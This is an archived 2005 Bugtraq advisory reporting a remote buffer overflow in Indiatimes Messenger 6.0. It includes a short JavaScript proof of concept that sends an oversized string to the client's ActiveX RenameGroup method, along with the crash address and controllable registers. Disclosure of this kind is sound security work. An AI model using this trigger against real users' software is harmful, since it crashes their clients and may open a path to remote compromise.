'Indiatimes Messenger 6.0 Buffer Overflow (Remote)'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Indiatimes Messenger 6.0 Buffer Overflow (Remote)
From:       ViPeR <viper31337 () yahoo ! co ! in>
Date:       2005-08-31 12:44:12
Message-ID: 20050831124412.41165.qmail () web8510 ! mail ! in ! yahoo ! com
[Download RAW message or body]

Indiatimes Messenger 6.0 Buffer Overflow (Remote)

Vulnerable Program : Indiatimes Messenger v6.0
(Latest)

Vendor URL : http://messenger.indiatimes.com/
(Attempt to contact thru
http://messenger.indiatimes.com/feedback.htm failed!)

Exploit Type : Remote DoS (Remote Compromise may also
be possible)

Discovered by : Gregory R. Panakkal

Proof Of Concept:

[script]
var obj1 = new
ActiveXObject("MMClient.MunduMessenger.1");
var buf = "";

for(i=0; i<1000; i++)
{
  buf += "A";
}

while(obj1.GetServerStatus() != "Logged In"); //wait
till login

obj1.RenameGroup("Friends", buf, 5);
[/script]


The program (MMClient.exe) crashes @ 
004B681B   8979 04          mov dword ptr
ds:[ecx+4],edi
with registers ecx, and edi = 0x41414141
[controllable]

So, remote compromise maybe possible (not confirmed).

rgds,
Gregory R. Panakkal
http://www.infogreg.com



	

	
		
__________________________________________________________ 
Yahoo! India Matrimony: Find your partner online. Go to http://yahoo.shaadi.com
[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic